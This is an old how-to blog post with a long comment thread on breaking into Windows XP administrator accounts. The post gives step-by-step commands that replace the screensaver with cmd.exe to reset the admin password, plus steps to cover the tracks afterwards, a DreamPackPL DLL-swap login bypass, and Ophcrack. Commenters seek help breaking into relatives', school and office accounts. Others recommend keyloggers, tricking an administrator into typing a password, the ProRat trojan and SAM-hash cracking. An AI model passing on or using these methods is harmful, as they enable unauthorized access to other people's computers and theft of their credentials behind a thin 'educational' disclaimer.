Hack Administrator Password, How To Crack The Administrator Password

This is provided only for educational purpose it is a simple way to Recover, Hack or Crack the Window XP Administrator Password. There are different Methods that I have outlined below.

Windows XP Privilege Escalation Exploit

(Before you continue Read the Updates at the bottom)

Here are the steps involved to Hack the Window XP Administrator Password .

  1. Go to Start –> Run –> Type in CMD
  2. You will get a command prompt. Enter these commands the way it is given
  3. cd\
  4. cd\ windows\system32
  5. mkdir temphack
  6. copy logon.scr temphack\logon.scr
  7. copy cmd.exe temphack\cmd.exe
  8. del logon.scr
  9. rename cmd.exe logon.scr
  10. exit

Wait its not over read the rest to find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is

Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.

So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command

net user password

Example: If the admin user name is clazh and you want change the password to pass Then type in the following command

net user clazh pass

This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.

Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.

  1. Go to Start –> Run –> Type in CMD
  2. You will get a command prompt. Enter these commands the way it is given
  3. cd\
  4. cd\ windows\system32\temphack
  5. copy logon.scr C:\windows\system32\logon.scr
  6. copy cmd.exe C:\windows\system32\cmd.exe
  7. exit

Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.

Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.

Update: Christian Mohn points out The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.

Update: The above Method only works if the system is FAT/FAT32 – because of the updated “user rights management” in NTFS – file level rights etc. This does not work on a system using NTFS.

Hack or Crack a Windows XP Administrator Password using OphCrack

Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.

Go to Ophcrack and download the live CD burn it to a disk and boot with it. It will depend on how strong the password is.

Recover the Password using DreamPackPL

Steps to Hack into a Windows XP Computer without changing password:

  1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
  2. Download DreamPackPL http://www.d–b.webpark.pl/dreampackpl_en.htm
  3. Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.
  4. Use any burning program that can burn ISO images.
  5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
  6. Press “R” to install DreamPackPL.
  7. Press “C” to install DreamPackPL by using the recovery console.
  8. Select the Windows installation that is currently on the computer (Normally is “1? if you only have one Windows installed)
  9. Backup your original sfcfiles.dll by typing: “ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
  10. Copy the hacked file from CD to system32 folder. Type: “copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
  11. Type “exit”, take out disk and reboot.
  12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
  13. Click the top graphic on the DreamPack menu and you will get a menu popup.
  14. Go to commands and enable the options and enable the god command.
  15. Type “god” in the password field to get in Windows.

You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.

Note: If you are running any kind of Anti-Virus Tool it will give you a prompt saying that it is a Virus since they have already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. The DreamPackPL helps you bypass the Windows Login screen and it is not destructive.

You could always use orphcrack.

Sorry meant ophcrack.

This way does work but not on all computers.

I used it on one computer and it worked.

But I used it to get on an account on my moms computer and access was denied.

ophcrack is an interesting program like it, but it doesn’t ALWAYS get the passwords, mainly the ones with symbols are the ones that don’t read right.

As in it won’t find the password.

But for idiots that use words like “Peaches” it works.

You should be able to use this method on a limited account, if not check out,http://ophcrack.sourceforge.net/

what about limited accounts ? what about if i can not boot from anything ? what soft can i use to find, not to crack, the admin pass ? the bios is pass protected!

my brother make my account as limited account but he has himself an administrator account is there is any way to hack his password or to make again my account as administrator

So this technique doesnt work at the particular school I attend. Dos says something about to many parameters to fill. And the file not actually existing.

try ERD Commander 2005 v5.0 BOOT CD its very easy to use you can download this file from ares p2p thats where I got my file from and oh yes youll need a iso burner to make your boot cd once youve burnt your boot cd all you have to do us reboot your machine erd commander boots up into a windows like state interface all you need to do then is use the wizard in start thats it within seconds you will reset your admin password no copy and pasting writing scripts or dos command changing or what ever shit even a kid can use this tool thats how simple it is.

…try ERD Commander 2005 v5.0 BOOT CD its …
1. For your ERD Boot CD, you need to have a CD drive on the system. This is not always the case, especially in offices.
…sounds like an idiot he doesn’t even respond to any of these follow up questions …
2. You never RAISED any questions which needed to be answered. So DON’T flame. Be a nice guy when you enter someone’s house.
…copied and pasted this post off another site…
3. Read things properly (a) to know that he’s mentioned the sites from which he’s used the data, (b) to avoid any CONFUSION in understanding simple lines in english.
4. I don’t really like to do this but next time you wish to suggest your skript kiddi3 thingy, please leave a link to your url. I don’t really prefer anonymous flames.
5. What Arpit has written is meant for a BEGINNER level audience. Now again, if you wish to see something really really in action, you might want to read the SAM file by writing your own code (no Cain, Ophcrack etc.), get the hashes, and crack them using Rainbow tables… Oh! wait. You might want to code your own Rainbow table generator. :)

this is really apeared to be a nice trick.
i will definatly try it.
as an cyber security expert it may going to help me lot.

Thx for all the info m8 but i’ve got 1 problem. My dad is the computer administrator and i’ve made a bet with him that i could crack his user account. I can access a limited account but when i tried the command promt thing (*first instructions) it didnt let me create the folder. Pls help me i really need help!

Suggestion: Try using a keylogger.
1. Do no follow the suggestion given above. It might pi** him off.
2. Never mess with parents and females.

everythings fine but i just cant open system 32 from dos in my limited account

i have a problem in login windows xp
some one change my administrator password to login windows xp . i have a difficulty to enter windows xp
now how can i enter in windows xp please help me.

good information i tried to go through but i am always faced with thus
a duplicated name exit or file cannot be found… what should be the first thing i should do ?
thanks looking forward on your usual assistance

this guy wrote this for begginners and it’s quite good, if your advanced then try booting the computer with something that will give you access to the hard disks, like Puppy or Austrumi or even DOS and extract the sam file to a convenient location, then crack the SAM with LCP or something, extract the hash and rainbow it

this process is successful

Ok please no more noobs call getting on to a website through a proxy call it hacking, and please read the methods at the top before just posting things like “how do I get the admin password?”.

Anyone having genuine problems I can recommend Ophcrack as most people, schools etc do not bother to set up a bios password which will allow you to set the CD as the default boot device by pressing F2/F12/DEL at startup to get into the bios menu. Once you have done this it usually takes about 10-15 minutes to boot up and get the password.

This is a particularly easy and clean method of getting the admin password and I recommend it to anyone, especially noobs as it has a GUI.

The only thing that comes on the monitor is the password request. Cannot go anywhere else……. don’t know the password though…… what do i do? All these instructions don’t help me….. cause i can’t even get past the password request……….what should i do?

I’m the Systems Administrator at our school, but sometimes the head admin changes the passwords and doesn’t give them to us. I have had the most success with keyloggers. they seem to always work.

And yes! I know you cant install things on a school computer with a limited account. BUT! you can install it on a Flash drive or External Hard disk. do it at home that way if it needs special file permissions it will be able to access them. then bring that said drive to school plug it in and boot the keylogger. a good one will run in the background and usually wont be found by an antivius program.

convince them to type the password for some reason… I said I needed to install drivers for my camera. and the log got it right away!!

Have fun! and don’t get caught!!


How can I get or crack Administrative rights as I am on a office network. We have no rights at all, cant instal or unistal. please help. is there any that i can get or crack network administrator rights or password. thanks

mmm, this does not work for me on my latest PC. windows.system32 is not writable.
Works fine on old pc though.

forgot to ask: does any one now how to:
backup the password file,
replace it with a password file which has a known admin password
then you can do whatever you like
then restored the old one

Is the link (http://www.d–b.webpark.pl/dreampackpl_en.htm) bad? I used Firefox and IE but there were errors on both browsers. Can anyone send me the .iso image please…?

didnt work it said access denied

in how to hack password on number 8 the computer denys the access what should i do

I have a system and i havn’t xp cd now and i forgot my administrator password or user account password,can i againg access my system without format my system ? I’m waiting for your answer.

Easy.A dumb Admin. kept Banning me so i gave him a good hacking

Hey,i tried to hack again,but the computer said that ”the syntax of the command is incorrect”and it also said”duplicate file exists or has been copied”someone please reply and explain to me what I did wrong.thank you.

i began hacking again,but the computer said”the syntax of the command is incorrect”some one please post back and explain what i did wrong cuz this never happened before.

so complicated…heres the easiest way..goto run, type cmd, type net users administrator then press enter, enter now any password you want

i forgot, after administrator type * and thats all

bill, this only works if you already have administrative rights.(which really defeats the purpose of doing it since you already have admin access.)

thats true pandawatord…. but if youre running as guest or without admin prive… you donot have administrative rights to create directory such as “temphack” or any other, You cant do hacking afterall unless you’ll pull it out the HDD. the purpose of this is if you donot know the password of administrator or any user of the PC.
If you are one of the users with administrative rights, you can do this or to any other users. I hope, I shared something

Whoever wrote the explanation for this doesn’t know a damn thing about cmd. MKDIR or MD are commands that create folders. *Sigh* I knew that when I was like 10 years old…

This does not work for me, I assume it’s becuase a .scr file isn’t loaded like an exe ??? I’ve tried command.com too which seems like the right one to use if this were going to work, maybe I just like trying to sound smart.

Hello, i am no expert but until i recently converted to OSX i have been a long term windows user. As for accessing a standalone NT based windows machine (i.e. NT, 2000, XP, VISTA) you use the login command prompt method. In my personal opinion if you are not savvy enough to know the workaround for the NTFS file security then you should not even attempt to “hack” these computers.

As for the banned websites, the chances are that your internet settings are configured to run through a ISA server, most of which are PROXY based. In this case i would recommend using a WMI or VBS script that delegates system level control and changes the setting therefore bypassing the GPO that enforced it. Also for those that are aware there are various group policy enumeration exploits that can be initiated from a client machine.

I will warn anybody that reads this, that using any of the above techniques without written permission is a breach of the various computer security laws and data protection acts. I was caught for using unauthorised scripts and GPO exploits my by previous school, i very closely escaped a criminal record. I am 16.

Happy Hacking

This is a very good hack I actually used it sometime back for personal gain but, about the blocked websites in schools you can just find proxy servers around the Internet just as useful as what Mr.Hunt had to say.

does this method delete the current password or just bypass it? kuz i dont want anyone to find out i logged on. thanks

If you want an application that bypasses all passwords, download “windows key” or “jtr”. Win Commander is also good. All you have to do with these applications is boot them as an ISO from cd and it will delete all password hashes from the system…. there is no way to extract a password as that would take months using a brute force attack.

O.K newbies if you need to crack a fucking password i suggest you get a program called ProRat(there are many versions, each works slightly diff. and has diff features)burn it onto a cd/ get on your computer limited access.if your having trouble downloading do it a friends house and jus save prorat to cd… download the prorat client/your anti-virus will go off,. just download it anyway. pay attention to the filename youll need to delete it manually later)after you download the client on your computer/ open the prorat program., this program is much like a trojan in the fact that you can do alot more than just get passwords but for efforts sake we will go with this. scroll in the program and look for the “get passwords” this feature tells the client/intruder to look in your computers system files and retrieve the pass words which displays them from pro rat to you.,. after you have retrieved your passwords. go to start/ click search/ then search for the client file you downloaded and delete it., the restart your computer with the passwords in hand,. PRORAT is just one great way of cracking/hacking., the tutorials on this site are very well written and very precise,., I love educational information..-I.T HONORS STUDENT

tell me how to edit system32 in limited account.and tell me what means “hash”

The system cannot find logon.scr

Try using the safemode administrator to gain acess to the permnissions of the user accounts on the PC. ive fixed 2 computers this way.

I have tried this and i am not able to get the system32 part to work i have limited priveledges so i think that is reason feed back plz